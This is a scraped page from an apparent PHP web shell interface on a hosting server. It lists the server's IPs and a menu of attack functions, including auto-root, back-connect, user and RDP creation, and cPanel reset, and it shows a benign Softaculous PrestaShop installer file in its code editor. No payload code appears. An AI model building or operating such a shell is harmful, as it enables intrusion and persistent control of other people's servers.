Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.222.163.134
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
presta14 /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
clone.php
7.21
KB
-rw-r--r--
edit.php
4.72
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
fileindex.php
870
B
-rw-r--r--
import.php
5.41
KB
-rw-r--r--
info.xml
4.04
KB
-rw-r--r--
install.js
1.12
KB
-rw-r--r--
install.php
9.47
KB
-rw-r--r--
install.xml
1.75
KB
-rw-r--r--
md5
1.29
KB
-rw-r--r--
notes.txt
192
B
-rw-r--r--
settings.inc.php
782
B
-rw-r--r--
update_rijndael.php
718
B
-rw-r--r--
upgrade.php
5.62
KB
-rw-r--r--
upgrade.xml
393
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_rijndael.php
<?php function __getkey(){ $key_size = mcrypt_get_key_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_ECB); $key = __passwdGen($key_size); return $key; } function __passwdGen($length = 8){ $str = 'abcdefghijkmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'; for ($i = 0, $passwd = ''; $i < $length; $i++) $passwd .= substr($str, mt_rand(0, strlen($str) - 1), 1); return $passwd; } function __getiv(){ $iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_ECB); $iv = base64_encode(mcrypt_create_iv($iv_size, MCRYPT_RAND)); return $iv; } $rijndael_iv = __getiv(); $rijndael_key = __getkey(); echo $rijndael_iv.'SOFTACULOUS'.$rijndael_key; @unlink('update_rijndael.php'); ?>
Close